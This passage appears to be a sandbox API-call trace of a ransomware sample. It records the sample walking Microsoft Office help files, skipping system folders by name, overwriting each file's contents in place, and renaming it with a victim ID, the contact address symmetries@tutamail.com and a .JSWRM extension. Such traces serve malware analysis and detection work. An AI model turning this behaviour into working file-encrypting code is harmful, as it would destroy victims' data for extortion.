RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0114.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0114.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0114.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.451] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0114.451] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0114.451] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.452] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.452] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0114.452] CloseHandle (hObject=0x238) returned 1 [0114.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0114.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0114.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0114.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0114.452] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0114.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0114.452] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.452] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0114.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0114.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0114.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0114.453] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0114.453] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9a9e866, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9a9e866, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_BASIC_K_COL.HXK", cAlternateFileName="LYNC_B~1.HXK")) returned 1 [0114.453] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2=".") returned 1 [0114.453] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="..") returned 1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="...") returned 1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="windows") returned -1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="recovery") returned -1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="perflogs") returned -1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="documents and settings") returned 1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="system volume information") returned -1 [0114.454] lstrcmpiW (lpString1="LYNC_BASIC_K_COL.HXK", lpString2="msocache") returned -1 [0114.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0114.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_K_COL.HXK", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0114.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_K_COL.HXK", cchWideChar=20, lpMultiByteStr=0x2412b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 20 [0114.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0114.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_K_COL.HXK", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0114.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0114.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_BASIC_K_COL.HXK", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_BASIC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 20 [0114.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0114.454] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0114.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.454] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.454] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0114.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.455] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0114.455] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.455] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0114.455] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0114.456] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.456] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0114.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0114.456] CloseHandle (hObject=0x238) returned 1 [0114.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0114.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0114.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0114.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0114.456] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0114.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0114.456] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.456] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0114.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0114.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0114.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0114.457] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0114.457] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x268, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_COL.HXC", cAlternateFileName="")) returned 1 [0114.457] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2=".") returned 1 [0114.457] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="..") returned 1 [0114.457] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="...") returned 1 [0114.457] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="windows") returned -1 [0114.457] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="recovery") returned -1 [0114.457] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="perflogs") returned -1 [0114.458] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="documents and settings") returned 1 [0114.458] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0114.458] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="system volume information") returned -1 [0114.458] lstrcmpiW (lpString1="LYNC_COL.HXC", lpString2="msocache") returned -1 [0114.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0114.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_COL.HXC", lpUsedDefaultChar=0x0) returned 12 [0114.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0114.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0114.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_COL.HXC", lpUsedDefaultChar=0x0) returned 12 [0114.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0114.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0114.458] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0114.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.458] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0114.458] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.459] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=616) returned 1 [0114.459] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.459] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x260) returned 0x20b1f8 [0114.459] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x260, lpOverlapped=0x0) returned 1 [0114.460] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.460] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x260, lpOverlapped=0x0) returned 1 [0114.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0114.460] CloseHandle (hObject=0x238) returned 1 [0114.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0114.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0114.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0114.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0114.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0114.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0114.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0114.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0114.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0114.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0114.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0114.460] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0114.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0114.460] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0114.460] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0114.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0114.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0114.516] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcc, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="LYNC_COL.HXT", cAlternateFileName="")) returned 1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2=".") returned 1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="..") returned 1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="...") returned 1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="windows") returned -1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="recovery") returned -1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="perflogs") returned -1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="documents and settings") returned 1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="system volume information") returned -1 [0114.516] lstrcmpiW (lpString1="LYNC_COL.HXT", lpString2="msocache") returned -1 [0114.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0114.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXT", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_COL.HXT", lpUsedDefaultChar=0x0) returned 12 [0114.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0114.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0114.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXT", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0114.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_COL.HXT", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_COL.HXT", lpUsedDefaultChar=0x0) returned 12 [0114.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0114.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0114.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0114.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.516] RtlAllocateHeap (HeapHandle=0x1e0000, 